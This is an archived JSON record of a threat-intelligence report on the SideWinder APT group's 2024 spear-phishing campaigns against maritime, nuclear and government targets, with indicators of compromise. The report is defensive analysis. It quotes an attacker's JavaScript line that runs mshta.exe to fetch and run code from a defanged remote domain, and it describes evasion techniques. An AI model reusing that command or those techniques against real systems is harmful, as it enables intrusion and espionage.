{ "id": "7dd8b997-a0eb-46d9-9c11-61d531cd238e", "created_at": "2026-04-06T00:13:42.886925Z", "updated_at": "2026-04-10T03:37:20.221049Z", "deleted_at": null, "sha1_hash": "417cf90b80b99d6168d4f464d12984ff6a0146f3", "title": "SideWinder targets the maritime and nuclear sectors with an updated toolset", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 808366, "plain_text": "SideWinder targets the maritime and nuclear sectors with an\r\nupdated toolset\r\nBy Giampaolo Dedola\r\nPublished: 2025-03-10 · Archived: 2026-04-05 14:36:58 UTC\r\nLast year, we published an article about SideWinder, a highly prolific APT group whose primary targets have been\r\nmilitary and government entities in Pakistan, Sri Lanka, China, and Nepal. In it, we described activities that had\r\nmostly happened in the first half of the year. We tried to draw attention to the group, which was aggressively\r\nextending its activities beyond their typical targets, infecting government entities, logistics companies and\r\nmaritime infrastructures in South and Southeast Asia, the Middle East, and Africa. We also shared further\r\ninformation about SideWinder’s post-exploitation activities and described a new sophisticated implant designed\r\nspecifically for espionage.\r\nWe continued to monitor the group throughout the rest of the year, observing intense activity that included updates\r\nto SideWinder’s toolset and the creation of a massive new infrastructure to spread malware and control\r\ncompromised systems. The targeted sectors were consistent with those we had seen in the first part of 2024, but\r\nwe noticed a new and significant increase in attacks against maritime infrastructures and logistics companies.\r\nIn 2024, we initially observed a significant number of attacks in Djibouti. Subsequently, the attackers shifted their\r\nfocus to other entities in Asia and showed a strong interest in targets within Egypt.\r\nMoreover, we observed other attacks that indicated a specific interest in nuclear power plants and nuclear energy\r\nin South Asia and further expansion of activities into new countries, especially in Africa.\r\nhttps://securelist.com/sidewinder-apt-updates-its-toolset-and-targets-nuclear-sector/115847/\r\nPage 1 of 10\n\nCountries and territories targeted by SideWinder in the maritime and logistics sectors in 2024\r\nIt is worth noting that SideWinder constantly works to improve its toolsets, stay ahead of security software\r\ndetections, extend persistence on compromised networks, and hide its presence on infected systems. Based on our\r\nobservation of the group’s activities, we presume they are constantly monitoring detections of their toolset by\r\nsecurity solutions. Once their tools are identified, they respond by generating a new and modified version of the\r\nmalware, often in under five hours. If behavioral detections occur, SideWinder tries to change the techniques used\r\nto maintain persistence and load components. Additionally, they change the names and paths of their malicious\r\nfiles. Thus, monitoring and detection of the group’s activities reminds us of a ping-pong game.\r\nInfection vectors\r\nThe infection pattern observed in the second part of 2024 is consistent with the one described in the previous\r\narticle.\r\nhttps://securelist.com/sidewinder-apt-updates-its-toolset-and-targets-nuclear-sector/115847/\r\nPage 2 of 10\n\nInfection flow\r\nThe attacker sends spear-phishing emails with a DOCX file attached. The document uses the remote template\r\ninjection technique to download an RTF file stored on a remote server controlled by the attacker. The file exploits\r\na known vulnerability (CVE-2017-11882) to run a malicious shellcode and initiate a multi-level infection process\r\nthat leads to the installation of malware we have named “Backdoor Loader”. This acts as a loader for\r\n“StealerBot”, a private post-exploitation toolkit used exclusively by SideWinder.\r\nThe documents used various themes to deceive victims into believing they are legitimate.\r\nSome documents concerned nuclear power plants and nuclear energy agencies.\r\nMalicious documents related to nuclear power plants and energy\r\nMany others concerned maritime infrastructures and various port authorities.\r\nhttps://securelist.com/sidewinder-apt-updates-its-toolset-and-targets-nuclear-sector/115847/\r\nPage 3 of 10\n\nMalicious documents relating to maritime infrastructures and different port authorities\r\nIn general, the detected documents predominantly concerned governmental decisions or diplomatic issues. Most\r\nof the attacks were aimed at various national ministries and diplomatic entities.\r\nWe also detected various documents that covered generic topics. For example, we found a document with\r\ninformation on renting a car in Bulgaria, a document expressing an intent to buy a garage, and another document\r\noffering a freelance video game developer a job working on a 3D action-adventure game called “Galactic\r\nOdyssey”.\r\nExamples of generic malicious documents\r\nRTF exploit\r\nThe exploit file contained a shellcode, which had been updated by the attacker since our previous research, but the\r\nmain goal remained the same: to run embedded JavaScript code invoking the mshtml.RunHTMLApplication\r\nfunction.\r\nhttps://securelist.com/sidewinder-apt-updates-its-toolset-and-targets-nuclear-sector/115847/\r\nPage 4 of 10\n\nIn the new version, the embedded JavaScript runs the Windows utility mshta.exe and obtains additional code from\r\na remote server:\r\njavascript:eval(\"var gShZVnyR = new ActiveXObject('WScript.Shell');gShZVnyR.Run('mshta.exe\r\nhttps://dgtk.depo-govpk[.]com/19263687/trui',0);window.close();\")\r\nThe newer version of the shellcode still uses certain tricks to avoid sandboxes and complicate analysis, although\r\nthey differ slightly from those in past versions.\r\nIt uses the GlobalMemoryStatusEx function to determine the size of RAM.\r\nIt attempts to load the nlssorting.dll library and terminates execution if operation succeeds.\r\nJavaScript loader\r\nThe RTF exploit led to the execution of the mshta.exe Windows utility, abused to download a malicious HTA from\r\na remote server controlled by the attacker.\r\nmshta.exe hxxps://dgtk.depo-govpk[.]com/19263687/trui\r\nThe remote HTA embeds a heavily obfuscated JavaScript file that loads further malware, the “Downloader\r\nModule”, into memory.\r\nThe JavaScript loader operates in two stages. The first stage begins execution by loading various strings, initially\r\nencoded with a substitution algorithm and stored as variables. It then checks the installed RAM and terminates if\r\nthe total size is less than 950 MB. Otherwise, the previously decoded strings are used to load the second stage.\r\nThe second stage is another JavaScript file. It enumerates the subfolders at\r\nWindows%\\Microsoft.NET\\Framework\\ to find the version of the .NET framework installed on the system and\r\nuses the resulting value to configure the environment variable COMPLUS_Version.\r\nFinally, the second stage decodes and loads the Downloader Module, which is embedded within its code as a\r\nbase64-encoded .NET serialized stream.\r\nDownloader Module\r\nThis component is a .NET library used to collect information about the installed security solution and download\r\nanother component, the “Module Installer”. These components were already described in the previous article and\r\nwill not be detailed again here.\r\nIn our latest investigation, we discovered a new version of the app.dll Downloader Module, which includes a more\r\nsophisticated function for identifying installed security solutions.\r\nhttps://securelist.com/sidewinder-apt-updates-its-toolset-and-targets-nuclear-sector/115847/\r\nPage 5 of 10\n\nIn the previous version, the malware used a simple WMI query to obtain a list of installed products. The new\r\nversion uses a different WMI, which collects the name of the antivirus and the related “productState”.\r\nFurthermore, the malware compares all running process names against an embedded dictionary. The dictionary\r\ncontains 137 unique process names associated with popular security solutions.\r\nThe WMI query is executed only when no Kaspersky processes are running on the system.\r\nBackdoor Loader\r\nThe infection chain concludes with the installation of malware that we have named “Backdoor Loader”, a library\r\nconsistently sideloaded using a legitimate and signed application. Its primary function is to load the “StealerBot”\r\nimplant into memory. Both the “Backdoor Loader” and “StealerBot” were thoroughly described in our prior\r\narticle, but the attacker has distributed numerous variants of the loader in recent months, whereas the implant has\r\nremained unchanged.\r\nIn the previous campaign, the “Backdoor Loader” library was designed to be loaded by two specific programs. For\r\ncorrect execution, it had to be stored on victims’ systems under one of the following names:\r\nDuring the most recent campaign, the attackers tried to diversify the samples, generating many other variants\r\ndistributed under the following names:\r\nJetCfg.dll\r\npolicymanager.dll\r\nwinmm.dll\r\nxmllite.dll\r\ndcntel.dll\r\nUxTheme.dll\r\nThe new malware variants feature an enhanced version of anti-analysis code and employ Control Flow Flattening\r\nmore extensively to evade detection.\r\nDuring the investigation, we found a new C++ version of the “Backdoor Loader” component. The malware logic\r\nis the same as that used in the .NET variants, but the C++ version differs from the .NET implants in that it lacks\r\nanti-analysis techniques. Furthermore, most of the samples were tailored to specific targets, as they were\r\nconfigured to load the second stage from a specific file path embedded in the code, which also included the user’s\r\nname. Example:\r\nhttps://securelist.com/sidewinder-apt-updates-its-toolset-and-targets-nuclear-sector/115847/\r\nPage 6 of 10\n\nC:\\Users\\[REDACTED]\\AppData\\Roaming\\valgrind\\[REDACTED FILE NAME].[REDACTED\r\nEXTENSION]\r\nIt indicates that these variants were likely used after the infection phase and manually deployed by the attacker\r\nwithin the already compromised infrastructure, after validating the victim.\r\nVictims\r\nSideWinder continues to attack its usual targets, especially government, military, and diplomatic entities. The\r\ntargeted sectors are consistent with those observed in the past, but it is worth mentioning that the number of\r\nattacks against the maritime and the logistics sectors has increased and expanded to Southeast Asia.\r\nFurthermore, we observed attacks against entities associated with nuclear energy. The following industries were\r\nalso affected: telecommunication, consulting, IT service companies, real estate agencies, and hotels.\r\nhttps://securelist.com/sidewinder-apt-updates-its-toolset-and-targets-nuclear-sector/115847/\r\nPage 7 of 10\n\nCountries and territories targeted by SideWinder in 2024\r\nOverall, the group has further extended its activities, especially in Africa. We detected attacks in Austria,\r\nBangladesh, Cambodia, Djibouti, Egypt, Indonesia, Mozambique, Myanmar, Nepal, Pakistan, Philippines, Sri\r\nLanka, the United Arab Emirates, and Vietnam.\r\nIn this latest wave of attacks, SideWinder also targeted diplomatic entities in Afghanistan, Algeria, Bulgaria,\r\nChina, India, the Maldives, Rwanda, Saudi Arabia, Turkey, and Uganda.\r\nConclusion\r\nSideWinder is a very active and persistent actor that is constantly evolving and improving its toolkits. Its basic\r\ninfection method is the use of an old Microsoft Office vulnerability, CVE-2017-11882, which once again\r\nemphasizes the critical importance of installing security patches.\r\nDespite the use of an old exploit, we should not underestimate this threat actor. In fact, SideWinder has already\r\ndemonstrated its ability to compromise critical assets and high-profile entities, including those in the military and\r\ngovernment. We know the group’s software development capabilities, which became evident when we observed\r\nhow quickly they could deliver updated versions of their tools to evade detection, often within hours. Furthermore,\r\nwe know that their toolset also includes advanced malware, like the sophisticated in-memory implant “StealerBot”\r\ndescribed in our previous article. These capabilities make them a highly advanced and dangerous adversary.\r\nTo protect against such attacks, we strongly recommend maintaining a patch management process to apply\r\nsecurity fixes (you can use solutions like Vulnerability Assessment and Patch Management and Kaspersky\r\nVulnerability Data Feed) and using a comprehensive security solution that provides incident detection and\r\nresponse, as well as threat hunting. Our product line for businesses helps identify and prevent attacks of any\r\ncomplexity at an early stage. The campaign described in this article relies on spear-phishing emails as the initial\r\nattack vector, which highlights the importance of regular employee training and awareness programs for corporate\r\nsecurity.\r\nWe will continue to monitor the activity of this group and to update heuristic and behavioral rules for effective\r\ndetection of malware.\r\n***More information, IoCs and YARA rules for SideWinder are available to customers of the Kaspersky\r\nIntelligence Reporting Service. Contact: intelreports@kaspersky.com.\r\nIndicators of compromise\r\nMicrosoft Office Documents\r\ne9726519487ba9e4e5589a8a5ec2f933\r\nd36a67468d01c4cb789cd6794fb8bc70\r\n313f9bbe6dac3edc09fe9ac081950673\r\nbd8043127abe3f5cfa61bd2174f54c60\r\ne0bce049c71bc81afe172cd30be4d2b7\r\nhttps://securelist.com/sidewinder-apt-updates-its-toolset-and-targets-nuclear-sector/115847/\r\nPage 8 of 10\n\n872c2ddf6467b1220ee83dca0e118214\r\n3d9961991e7ae6ad2bae09c475a1bce8\r\na694ccdb82b061c26c35f612d68ed1c2\r\nf42ba43f7328cbc9ce85b2482809ff1c\r\nBackdoor Loader\r\n0216ffc6fb679bdf4ea6ee7051213c1e\r\n433480f7d8642076a8b3793948da5efe\r\nDomains and IPs\r\npmd-office[.]info\r\nmodpak[.]info\r\ndirctt888[.]info\r\nmodpak-info[.]services\r\npmd-offc[.]info\r\ndowmloade[.]org\r\ndirctt888[.]com\r\nportdedjibouti[.]live\r\nmods[.]email\r\ndowmload[.]co\r\ndownl0ad[.]org\r\nd0wnlaod[.]com\r\nd0wnlaod[.]org\r\ndirctt88[.]info\r\ndirectt88[.]com\r\nfile-dwnld[.]org\r\ndefencearmy[.]pro\r\ndocument-viewer[.]info\r\naliyum[.]email\r\nd0cumentview[.]info\r\ndebcon[.]live\r\ndocument-viewer[.]live\r\ndocumentviewer[.]info\r\nms-office[.]app\r\nms-office[.]pro\r\npncert[.]info\r\nsession-out[.]com\r\nzeltech[.]live\r\nziptec[.]info\r\ndepo-govpk[.]com\r\ncrontec[.]site\r\nhttps://securelist.com/sidewinder-apt-updates-its-toolset-and-targets-nuclear-sector/115847/\r\nPage 9 of 10\n\nmteron[.]info\r\nmevron[.]tech\r\nveorey[.]live\r\nmod-kh[.]info\r\nSource: https://securelist.com/sidewinder-apt-updates-its-toolset-and-targets-nuclear-sector/115847/\r\nhttps://securelist.com/sidewinder-apt-updates-its-toolset-and-targets-nuclear-sector/115847/\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://securelist.com/sidewinder-apt-updates-its-toolset-and-targets-nuclear-sector/115847/" ], "report_names": [ "115847" ], "threat_actors": [ { "id": "d0c0a5ea-3066-42a5-846c-b13527f64a3e", "created_at": "2023-01-06T13:46:39.080551Z", "updated_at": "2026-04-10T02:00:03.206572Z", "deleted_at": null, "main_name": "RAZOR TIGER", "aliases": [ "APT-C-17", "T-APT-04", "SideWinder" ], "source_name": "MISPGALAXY:RAZOR TIGER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6b9fc913-06c6-4432-8c58-86a3ac614564", "created_at": "2022-10-25T16:07:24.185236Z", "updated_at": "2026-04-10T02:00:04.893541Z", "deleted_at": null, "main_name": "SideWinder", "aliases": [ "APT-C-17", "APT-Q-39", "BabyElephant", "G0121", "GroupA21", "HN2", "Hardcore Nationalist", "Rattlesnake", "Razor Tiger", "SideWinder", "T-APT-04" ], "source_name": "ETDA:SideWinder", "tools": [ "BroStealer", "Capriccio RAT", "callCam" ], "source_id": "ETDA", "reports": null }, { "id": "173f1641-36e3-4bce-9834-c5372468b4f7", "created_at": "2022-10-25T15:50:23.349637Z", "updated_at": "2026-04-10T02:00:05.3486Z", "deleted_at": null, "main_name": "Sidewinder", "aliases": [ "Sidewinder", "T-APT-04" ], "source_name": "MITRE:Sidewinder", "tools": [ "Koadic" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434422, "ts_updated_at": 1775792240, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/417cf90b80b99d6168d4f464d12984ff6a0146f3.pdf", "text": "https://archive.orkl.eu/417cf90b80b99d6168d4f464d12984ff6a0146f3.txt", "img": "https://archive.orkl.eu/417cf90b80b99d6168d4f464d12984ff6a0146f3.jpg" } }